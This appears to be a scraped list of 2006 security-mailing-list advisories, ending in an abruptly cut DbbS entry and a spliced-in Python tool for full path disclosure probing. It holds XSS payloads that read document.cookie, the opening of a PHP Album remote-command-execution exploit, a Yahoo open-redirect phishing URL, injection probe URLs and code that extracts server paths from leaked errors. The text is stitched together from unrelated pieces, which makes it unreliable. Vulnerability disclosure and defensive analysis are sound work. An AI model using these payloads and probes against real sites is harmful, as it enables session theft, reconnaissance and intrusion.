PhpWebFTP 3.2 Login Script
2006-04-17  arko dhar gmail com
  Summary: phpWebFTP enables connections to FTP servers, even behind a firewall not allowing traffic. phpWebFTP bypasses the firewall by making an FTP connection from your webserver to the FTP server and transferring the files to your webclient over the h...

Snipe Gallery <= 3.1.4 Multiple XSS
2006-04-15  qex bsdmail org
  Snipe Gallery <= 3.1.4 Multiple XSS
  http://www.[SITE].com/[PATH]/view.php?gallery_id='><script>alert(document.cookie)</script>
  http://www.[SITE].com/[PATH]/search.php?keyword='><script>alert(document.cookie)</script>&search_cat=&search_type=and
  http://www.[SITE].com/[PATH]/image.php?page=1&gallery_...

phpFaber TopSites Script Cross-Site Scripting
2006-04-15  botan linuxmail org
  Description: phpFaber TopSites is a feature-packed, reliable and secure Top List coded in PHP and MySQL. phpFaber TopSites has proven its reliability time and time again under the most active server environments. Our feature list is large, including all elements you need to easily maintain your li...

RE: osCommerce "extras/" information/source code disclosure
2006-04-15  Michael Scheidell (scheidell secnap net)
  > -----Original Message-----
  > From: rgod (at) autistici (dot) org [mailto:rgod (at) autistici (dot) org]
  > Sent: Friday, April 14, 2006 7:20 AM
  > To: bugtraq (at) securityfocus (dot) com
  > Subject: osCommerce "extras/" information/source code disclosure
  >
  >
  > ---- osCommerce <= 2.2 "extras/" information/source code disclosur...

PHP Album <= 0.3.2.3 remote commands execution
2006-04-15  rgod autistici org
    #!/usr/bin/php -q -d short_open_tag=on
    <?
    echo "PHP Album <= 0.3.2.3 remote cmmnds xctn\r\n";
    echo "by rgod rgod (at) autistici (dot) org\r\n";
    echo "site: http://retrogod.altervista.org\r\n";
    echo "-> this works with magic_quotes_gpc=Off & register_globals=On\r\n";
    echo "dork: \"powered by php photo album\" - ...

[SECURITY] [DSA 1035-1] New fcheck packages fix insecure temporary file creation
2006-04-15  Moritz Muehlenhoff (jmm debian org)

[eVuln] aWebBB Multiple XSS and SQL Injection Vulnerabilities
2006-04-15  alex evuln com
  New eVuln Advisory: aWebBB Multiple XSS and SQL Injection Vulnerabilities
  http://evuln.com/vulns/117/summary.html
  -------------------- Summary --------------------
  eVuln ID: EV0117
  CVE: CVE-2006-1637 CVE-2006-1638
  Software: aWebBB
  Software's Web Site: http://labs.aweb.com.au/
  Versions: 1.2
  Critical Level...

[KAPDA] CopperminePhotoGallery1.4.4 ~ PluginInclusionSystem(index.php) ~ RemoteFileInclusion attack
2006-04-15  addmimistrator gmail com  (1 reply)
  ORIGINAL ADVISORY: http://myimei.com/security/2006-04-14/copperminephotogallery144-plugininclusionsystemindexphp-remotefileinclusion-attack.html
  ------ Summary ------
  Software: CPG Coppermine Photo Gallery
  Software's Web Site: http://coppermine.sourceforge.net/
  Versions: 1.4.4.stable
  Class: Remote
  St...

Re: [KAPDA] CopperminePhotoGallery1.4.4 ~ PluginInclusionSystem(index.php) ~ RemoteFileInclusion attack
2006-04-16  Dariusz Kolasinski (ofi evil net pl)

[KAPDA] MyBB1.1.0 ~ global.php ~ ParameterExtracting
2006-04-15  addmimistrator gmail com
  ORIGINAL ADVISORY: http://myimei.com/security/2006-04-14/mybb110globalphpparameterextracting.html
  ------ Summary ------
  Software: MyBB
  Software's Web Site: http://www.mybboard.com
  Versions: 1.1.0
  Class: Remote
  Status: Unpatched
  Exploit: Available
  Solution: Available
  Discovered by: imei addmimistrator...

ZDI-06-010: Mozilla Firefox CSS Letter-Spacing Heap Overflow Vulnerability
2006-04-15  zdi-disclosures 3com com
  ZDI-06-010: Mozilla Firefox CSS Letter-Spacing Heap Overflow Vulnerability
  http://www.zerodayinitiative.com/advisories/ZDI-06-010.html
  April 13, 2006
  -- CVE ID: CVE-2006-1730
  -- Affected Vendor: Mozilla
  -- Affected Products: Mozilla 1.7.x and below, Firefox 1.5.x and below
  -- TippingPoint(TM) IPS...

Re: QuickBlogger v1.4 Cross-Site Scripting
2006-04-14  Steven M. Christey (coley mitre org)
  This is yet another case where XSS is resultant from a more serious issue. The primary issue here involves local file inclusion. retrogod-style attacks might be feasible by injecting PHP code into text-based data files within the application, then including those text files using this issue; howev...

Dokeos 1.6.4 SQL Injection Vulnerability
2006-04-11  Alvaro Olavarria (aolavarria secure cl)
  Dokeos 1.6.4 SQL Injection Vulnerability
  Author: Alvaro Olavarria <aolavarria (at) secure (dot) cl>
  Affected: Dokeos <= 1.6.4
  Status: Notified hereby
  Vendor url: http://www.dokeos.com
  Background. Dokeos is an Open Source elearning and course management web application translated in 34 languages and helpi...

a Yahoo Vulnerability
2006-04-12  r57shell gmail com
  /* Advisory */
  Homepage: http://www.yahoo.com
  Found by: Tontonq a.k.a Tontong
  /* Impact */
  This vulnerability can be used to refresh to fake mail
  /* Credits */
  All SpyMS Userz WwW.SpyMasterSnake.org
  */ Credits /*
  example: http://login.yahoo.com/config/login?.src=fpctx&.done=http://yourfakemail...
Full path disclosure
http://www.site.com/DbbS/topics.php?fcategoryid='
http://www.site.com/DbbS/script.php?unavariabile[]=
http://www.site.com/DbbS/script.php?GLOBALS[]=
http://www.site.com/DbbS/script.php?_SERVER[]=
MD5 Password
http://www.site.com/DbbS/to
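The DbbS full path disclosure URLs above all work the same way: a parameter the script expects to be a string is turned into an array with `[]` (or given a stray quote), PHP complains, and with display_errors on the warning text, including the script's filesystem path, is echoed into the page. The helper below is an added example, not code from the DbbS advisory or the DbbS project: it generates those probe variants for any parameter name, pulls the leaked path and line number out of a response, and derives the document root from it. The two HTTP response bodies are constructed for the example (the exact wording of PHP's messages differs between PHP versions), and the host, path and parameter names are assumptions.

```python
"""Full path disclosure (FPD) probe helper. Added example; not from the DbbS
advisory. Server paths, hostnames, parameter names and the two sample
responses are constructed for illustration."""
import re
from urllib.parse import urlsplit, urlunsplit

# PHP error lines (after <b>/<br> tags are stripped) look like:
#   Warning: strlen() expects parameter 1 to be string, array given in /var/www/x.php on line 12
#   Fatal error: Cannot re-assign auto-global variable GLOBALS in /var/www/x.php on line 3
PHP_ERROR_RE = re.compile(
    r"(?:Warning|Notice|Fatal error|Parse error)\s*:\s*(?P<msg>.*?)\s+in\s+"
    r"(?P<path>(?:/|[A-Za-z]:\\)[^\s<]+?\.(?:php|inc))\s+on\s+line\s+(?P<line>\d+)"
)


def fpd_probe_urls(url, param):
    """Build the probe variants the advisory lists, for an arbitrary parameter name.

    Any existing query string on `url` is dropped so each probe carries exactly
    one malformed parameter.
    """
    parts = urlsplit(url)
    base = urlunsplit((parts.scheme, parts.netloc, parts.path, "", ""))
    return [
        f"{base}?{param}='",    # unbalanced quote: SQL/parse error carrying the path
        f"{base}?{param}[]=",   # string expected, array given
        f"{base}?GLOBALS[]=",   # register_globals=On: cannot re-assign auto-global
        f"{base}?_SERVER[]=",
    ]


def extract_disclosed_paths(body):
    """Return (path, line, message) for every PHP error leaked in a response body."""
    text = re.sub(r"<[^>]+>", "", body)  # html_errors=On wraps errors in <b>...</b><br />
    return [
        (m.group("path"), int(m.group("line")), m.group("msg"))
        for m in PHP_ERROR_RE.finditer(text)
    ]


def webroot_from_path(fs_path, url_path):
    """Strip the request path off the leaked filesystem path to get the document root.

    Returns None when the leaked file is not the requested script (e.g. an
    included library), since the two paths then do not line up.
    """
    norm = fs_path.replace("\\", "/")
    if url_path.startswith("/") and norm.endswith(url_path):
        return norm[: -len(url_path)] or "/"
    return None


# Constructed sample responses (not captured from a real server).
SAMPLE_WARNING = (
    "<br />\n<b>Warning</b>:  strlen() expects parameter 1 to be string, array given in "
    "<b>/var/www/html/DbbS/script.php</b> on line <b>12</b><br />\n"
    "<html><body>ok</body></html>"
)
SAMPLE_FATAL = (
    "<br />\n<b>Fatal error</b>:  Cannot re-assign auto-global variable GLOBALS in "
    "<b>/var/www/html/DbbS/script.php</b> on line <b>3</b><br />\n"
)


def analyze(body, url_path):
    """Summarize what a single probe response gives away."""
    leaks = extract_disclosed_paths(body)
    roots = {webroot_from_path(p, url_path) for p, _, _ in leaks} - {None}
    return {"leaks": leaks, "webroot": roots.pop() if roots else None}


if __name__ == "__main__":
    for u in fpd_probe_urls("http://www.site.com/DbbS/script.php", "unavariabile"):
        print(u)
    print(analyze(SAMPLE_WARNING, "/DbbS/script.php"))
    print(analyze(SAMPLE_FATAL, "/DbbS/script.php"))
```

On the defensive side the same checks point at the fix: production php.ini should run with display_errors=Off and log_errors=On so the path goes to the server log rather than the client, and a script should reject a parameter with is_string() before passing it to string functions instead of trusting that `$_GET['x']` is scalar.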